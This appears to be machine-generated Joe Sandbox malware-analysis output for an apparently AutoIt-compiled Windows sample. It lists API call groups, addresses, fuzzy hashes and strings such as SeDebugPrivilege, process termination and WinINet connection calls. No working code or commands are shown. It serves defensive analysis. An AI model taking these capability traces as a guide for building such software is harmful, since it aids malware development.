                                    APIs
                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00815186
                                    • ShowWindow.USER32(?,00000000), ref: 008151C7
                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 008151CD
                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 008151D1
                                      • Part of subcall function 00816FBA: DeleteObject.GDI32(00000000), ref: 00816FE6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0081520D
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0081521A
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0081524D
                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00815287
                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00815296
                                    Similarity
                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                    • String ID:
                                    • API String ID: 3210457359-0
                                    • Opcode ID: ac034c54e12bccad9d23b2e9b75f3a906eb698f9e3be89de7e3a31c8c3a9269b
                                    • Instruction ID: de326cf4cc1d82dbbd8a55e0bdfde45dd8abc44c3e1c4877106e9d0c39024979
                                    • Opcode Fuzzy Hash: ac034c54e12bccad9d23b2e9b75f3a906eb698f9e3be89de7e3a31c8c3a9269b
                                    • Instruction Fuzzy Hash: AA51A131A90A08FEEF219F28CC49BD83B69FF85325F148115F625D62E0C7B5A9D0DB41
                                    APIs
                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007D6890
                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007D68A9
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007D68B9
                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007D68D1
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007D68F2
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00798874,00000000,00000000,00000000,000000FF,00000000), ref: 007D6901
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007D691E
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00798874,00000000,00000000,00000000,000000FF,00000000), ref: 007D692D
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 1268354404-0
                                    • Opcode ID: 92d9fb51b74d73098459245d9075a0889053a5b116f654bbaac4d2da426199ea
                                    • Instruction ID: 6f0fea78111396634e617f2a5471fe9f34204fb2d0ade133d7f0a5c3046b1c87
                                    • Opcode Fuzzy Hash: 92d9fb51b74d73098459245d9075a0889053a5b116f654bbaac4d2da426199ea
                                    • Instruction Fuzzy Hash: 1E5177B0600209EFDF20CF28DC55BAA7BB6FF58750F144519F942972A0DB78E990DB50
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007FC182
                                    • GetLastError.KERNEL32 ref: 007FC195
                                    • SetEvent.KERNEL32(?), ref: 007FC1A9
                                      • Part of subcall function 007FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007FC272
                                      • Part of subcall function 007FC253: GetLastError.KERNEL32 ref: 007FC322
                                      • Part of subcall function 007FC253: SetEvent.KERNEL32(?), ref: 007FC336
                                      • Part of subcall function 007FC253: InternetCloseHandle.WININET(00000000), ref: 007FC341
                                    Similarity
                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 337547030-0
                                    • Opcode ID: 48436afe7e800188d8c7399d2070a80c0702dcbe9b7226bfc9227fe1c2b562ac
                                    • Instruction ID: 240d4eff223b76c8993043bf8428c06a7b058c8dfba56a83292c7b764f3b9a4c
                                    • Opcode Fuzzy Hash: 48436afe7e800188d8c7399d2070a80c0702dcbe9b7226bfc9227fe1c2b562ac
                                    • Instruction Fuzzy Hash: B4318E7164060DAFDB229FA5DE44AB6BBFCFF18300B14841DFA5686711D739E814EB60
                                    APIs
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E25BD
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007E25DB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007E25DF
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E25E9
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007E2601
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 007E2605
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E260F
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007E2623
                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 007E2627
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 98937fef3241acca76538345995cb0104e6e516ee69c1fb9de2bf6a371b049c5
                                    • Instruction ID: 1d2a2e189bfcbe958e9f90a7645dafa4858fd5d32e2f2144f2a2c02c7bb7e944
                                    • Opcode Fuzzy Hash: 98937fef3241acca76538345995cb0104e6e516ee69c1fb9de2bf6a371b049c5
                                    • Instruction Fuzzy Hash: FA01B1303D0354BBFB1067699C8EF993E9DEF5EB12F104015F318AF0D1C9E624458A69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,007E1449,?,?,00000000), ref: 007E180C
                                    • HeapAlloc.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E1813
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007E1449,?,?,00000000), ref: 007E1828
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,007E1449,?,?,00000000), ref: 007E1830
                                    • DuplicateHandle.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E1833
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007E1449,?,?,00000000), ref: 007E1843
                                    • GetCurrentProcess.KERNEL32(007E1449,00000000,?,007E1449,?,?,00000000), ref: 007E184B
                                    • DuplicateHandle.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E184E
                                    • CreateThread.KERNEL32(00000000,00000000,007E1874,00000000,00000000,00000000), ref: 007E1868
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
                                    • Opcode ID: 95a70b444e04a8292a35da571994894d2bb9480fe39b7a4c2f0e2497dd0638c2
                                    • Instruction ID: b80bba52bab175acef6b9af2cef32e766330510e50d6a63318462bf7437bf5e9
                                    • Opcode Fuzzy Hash: 95a70b444e04a8292a35da571994894d2bb9480fe39b7a4c2f0e2497dd0638c2
                                    • Instruction Fuzzy Hash: FF015CB56C0344BFE610AB65DC49F977B6DFB89B11F418411FA05DB191D67598008B60
                                    APIs
                                      • Part of subcall function 007ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 007ED501
                                      • Part of subcall function 007ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 007ED50F
                                      • Part of subcall function 007ED4DC: CloseHandle.KERNEL32(00000000), ref: 007ED5DC
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0080A16D
                                    • GetLastError.KERNEL32 ref: 0080A180
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0080A1B3
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0080A268
                                    • GetLastError.KERNEL32(00000000), ref: 0080A273
                                    • CloseHandle.KERNEL32(00000000), ref: 0080A2C4
                                    Strings
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 1056a1bb73af6f8f95ca0c9b71984c59be592578219422f30f77d2412b987e34
                                    • Instruction ID: 29e6f824224c133b6c4f869294ea196fba01f2787b603594f5a506c9c16ef41a
                                    • Opcode Fuzzy Hash: 1056a1bb73af6f8f95ca0c9b71984c59be592578219422f30f77d2412b987e34
                                    • Instruction Fuzzy Hash: 2C617B31244342AFD724DF15C898F15BBA5FF54318F18849CE4668BBA2C776EC45CB92
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00813925
                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0081393A
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00813954
                                    • _wcslen.LIBCMT ref: 00813999
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 008139C6
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008139F4
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Window_wcslen
                                    • String ID: SysListView32
                                    • API String ID: 2147712094-78025650
                                    • Opcode ID: 620a7884fdc6732e4c029e79bc7b7ae7564a6e119251673af5069e5030b52d4c
                                    • Instruction ID: aa18d9434001613de9625f1052ff10d9de67ab3473651d54ed95b3a9ccc17366
                                    • Opcode Fuzzy Hash: 620a7884fdc6732e4c029e79bc7b7ae7564a6e119251673af5069e5030b52d4c
                                    • Instruction Fuzzy Hash: 2E41B371A00219ABEF219F64CC49FEA7BADFF08354F10052AF958E7281D7759E94CB90
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007EBCFD
                                    • IsMenu.USER32(00000000), ref: 007EBD1D
                                    • CreatePopupMenu.USER32 ref: 007EBD53
                                    • GetMenuItemCount.USER32(010A7200), ref: 007EBDA4
                                    • InsertMenuItemW.USER32(010A7200,?,00000001,00000030), ref: 007EBDCC
                                    Strings
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                    • String ID: 0$2
                                    • API String ID: 93392585-3793063076
                                    • Opcode ID: 6ceb99e195d7020a014f91997bb556a287b6a5bb57546d17920c3902bd49c972
                                    • Instruction ID: 006a32036d2674db9d78f29e8b285353820ad8f888a7583fa63f7c6e6673ea60
                                    • Opcode Fuzzy Hash: 6ceb99e195d7020a014f91997bb556a287b6a5bb57546d17920c3902bd49c972
                                    • Instruction Fuzzy Hash: 6F519E70A02289DBDB11CFAADC88BAEBFF9BF49314F148119E411DB290D778A941CB51
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2D4B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 007A2D53
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2DE1
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 007A2E0C
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2E61
                                    Strings
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: &Hz$csm
                                    • API String ID: 1170836740-1334577351
                                    • Opcode ID: 796526aa4006d70243326e4688927cdd00d0c4a363c161548c79402c1e16c985
                                    • Instruction ID: d312ecbd4f052dfc322e0a568cf40d641e500baab8b6d61d5dfbbf0f927277df
                                    • Opcode Fuzzy Hash: 796526aa4006d70243326e4688927cdd00d0c4a363c161548c79402c1e16c985
                                    • Instruction Fuzzy Hash: E1417534A01209EBCF14DF6CC849A9EBBB5BF86324F148255E8146B353D739DA56CB90
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 007EC913
                                    Strings
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 6ad15095ae479940d53f26fcb8f8cb35b27ae6f018443f462eaf60a1652368e1
                                    • Instruction ID: d230d6bf5cc7a7b596c441188e14cc7e5b7408be0b59f00ab2b0626b89ce9589
                                    • Opcode Fuzzy Hash: 6ad15095ae479940d53f26fcb8f8cb35b27ae6f018443f462eaf60a1652368e1
                                    • Instruction Fuzzy Hash: 36113D3968A34AFEE7025B159C83CAE279CDF5A314B10412AF500F62C3E7BD6D015269
                                    APIs
                                    Similarity
                                    • API ID: _wcslen$LocalTime
                                    • String ID:
                                    • API String ID: 952045576-0
                                    • Opcode ID: c8b9b18fa680f9b20b3d5cdf8d540b92442f67d5506483de81b8e873f1bd84d8
                                    • Instruction ID: beabf0b430735e491155de945da1d2519749bd857e57f5b23c9b0c45ee15793c
                                    • Opcode Fuzzy Hash: c8b9b18fa680f9b20b3d5cdf8d540b92442f67d5506483de81b8e873f1bd84d8
                                    • Instruction Fuzzy Hash: FC41B565C11158F5CB11EBF48C8EACFB7ACAF8A300F004962E514E3162FB38E255C3A6
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 0079F953
                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 007DF3D1
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 007DF454
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 235573fd990b46ba83e7d8c6bdf3dda6053d6a6f7415530857bf51f5b27228d4
                                    • Instruction ID: d345d135608489989dbfadfc1e8ef28ab105ad706cea4811c8a459c5ba9cd04c
                                    • Opcode Fuzzy Hash: 235573fd990b46ba83e7d8c6bdf3dda6053d6a6f7415530857bf51f5b27228d4
                                    • Instruction Fuzzy Hash: ED41EB31614A80BECF359B2DE88876A7BA5BF56334F14853DE047D6660C67DB880C711
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00812D1B
                                    • GetDC.USER32(00000000), ref: 00812D23
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00812D2E
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00812D3A
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00812D76
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00812D87
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00815A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00812DC2
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00812DE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: ad84b1fa9bca8ecef35241b53c9a23f8c3ffca2d7c66b70a658f895197a3ec6f
                                    • Instruction ID: 5dc854c8dbe0111326f02e10cefde91cbc045ccb84b59f7badcb77077c57fcb3
                                    • Opcode Fuzzy Hash: ad84b1fa9bca8ecef35241b53c9a23f8c3ffca2d7c66b70a658f895197a3ec6f
                                    • Instruction Fuzzy Hash: E3317872241214BFEB218F54DC8AFEB3BADFF09711F048055FE08DA291C6759890CBA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: ee58ce7cc217cff8a42da3822713cd8fbd86c1f5e6ec2dfddfe95ecf6bddd2be
                                    • Instruction ID: 32bc72f72e19ea8c29555023ed463e0ca64e12560ca51f39494ec66dd9850784
                                    • Opcode Fuzzy Hash: ee58ce7cc217cff8a42da3822713cd8fbd86c1f5e6ec2dfddfe95ecf6bddd2be
                                    • Instruction Fuzzy Hash: 7321DA6164295DB7E6149A124D92FFB335CFF6979CF440120FE04DA682F76CED1082E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: d6b0ae3c1938b0aa392649a4c1ec28da1ad91f14923157a8c7490304b8e87735
                                    • Instruction ID: 4d96cb9b4c2998f19281cf3151567ad04b63375a6d75600c007f99ff2cbf6a7c
                                    • Opcode Fuzzy Hash: d6b0ae3c1938b0aa392649a4c1ec28da1ad91f14923157a8c7490304b8e87735
                                    • Instruction Fuzzy Hash: 7FD18C75A0060AAFDF50CFA8CC85AAEB7B5FF48344F158069E915EB281E7709D45CFA0
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 007C15CE
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007C1651
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007C16E4
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007C16FB
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007C1777
                                    • __freea.LIBCMT ref: 007C17A2
                                    • __freea.LIBCMT ref: 007C17AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 2829977744-0
                                    • Opcode ID: 5e4bfa034fa628ee7e77fbb5f24352ea2a88ab77ba909b7aa266aa53ce619875
                                    • Instruction ID: 48c830c37935c7503f38fb12c9f173480405cf5ac042213de6a604e5e263d7e0
                                    • Opcode Fuzzy Hash: 5e4bfa034fa628ee7e77fbb5f24352ea2a88ab77ba909b7aa266aa53ce619875
                                    • Instruction Fuzzy Hash: D8918271E002169ADB208E74D895FEE7BB5AF4A710F98467DE801E7242DB39DD50CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2610073882-625585964
                                    • Opcode ID: 38e11b34f4f8f7417e7ef7e01970ca216a7869362f911bef9dfba21f51abc282
                                    • Instruction ID: e7cdf7bff796a9151327a04e60ea5d71b98cdc7305baa095c4e03e1a83165356
                                    • Opcode Fuzzy Hash: 38e11b34f4f8f7417e7ef7e01970ca216a7869362f911bef9dfba21f51abc282
                                    • Instruction Fuzzy Hash: 24919DB1A40219ABDF60CFA4CC48FAEBBB8FF46714F108559F615EB281D7709945CBA0
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 007F125C
                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007F1284
                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007F12A8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F12D8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F135F
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F13C4
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F1430
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                    • String ID:
                                    • API String ID: 2550207440-0
                                    • Opcode ID: 9768d362fc5bcc8546b5540296ebe42c7092f5505bf39c7e7986d66cada0a39a
                                    • Instruction ID: 759b4816fad5b0b321e8caaad3aaf983bf6d8e2cb3c4e75e360dddd07b63fdce
                                    • Opcode Fuzzy Hash: 9768d362fc5bcc8546b5540296ebe42c7092f5505bf39c7e7986d66cada0a39a
                                    • Instruction Fuzzy Hash: 2291AF71A00219EFDB01DFA4D888BBEB7B5FF45325F508029EA11EB391D778A941CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 2a47ff5b488e2e75364b87e1940e747b9b049e9de84d9859f51a90e049357e6b
                                    • Instruction ID: 0d8141f05aef44add08fe9bc034301b2965beb795793c84028256af353f0bd18
                                    • Opcode Fuzzy Hash: 2a47ff5b488e2e75364b87e1940e747b9b049e9de84d9859f51a90e049357e6b
                                    • Instruction Fuzzy Hash: 0E913671940219EFDF14CFA9D888AEEBBB8FF49320F148059E515B7291D378A951CB60
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0080396B
                                    • CharUpperBuffW.USER32(?,?), ref: 00803A7A
                                    • _wcslen.LIBCMT ref: 00803A8A
                                    • VariantClear.OLEAUT32(?), ref: 00803C1F
                                      • Part of subcall function 007F0CDF: VariantInit.OLEAUT32(00000000), ref: 007F0D1F
                                      • Part of subcall function 007F0CDF: VariantCopy.OLEAUT32(?,?), ref: 007F0D28
                                      • Part of subcall function 007F0CDF: VariantClear.OLEAUT32(?), ref: 007F0D34
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4137639002-1221869570
                                    • Opcode ID: 86a8556bc399e6144553d2eb9a5c9bafeb376aa8712b7c7c74572843bb07b6d0
                                    • Instruction ID: 2f938859f5246a6b9c50ae0d9624bc68f250bea2224b27dc3e7b129a2d064d82
                                    • Opcode Fuzzy Hash: 86a8556bc399e6144553d2eb9a5c9bafeb376aa8712b7c7c74572843bb07b6d0
                                    • Instruction Fuzzy Hash: 9E9125746083059FC744EF24C89596AB7E8FF89314F14882DF88A97391DB35EE05CB92
                                    APIs
                                      • Part of subcall function 007E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?,?,007E035E), ref: 007E002B
                                      • Part of subcall function 007E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0046
                                      • Part of subcall function 007E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0054
                                      • Part of subcall function 007E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?), ref: 007E0064
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00804C51
                                    • _wcslen.LIBCMT ref: 00804D59
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00804DCF
                                    • CoTaskMemFree.OLE32(?), ref: 00804DDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
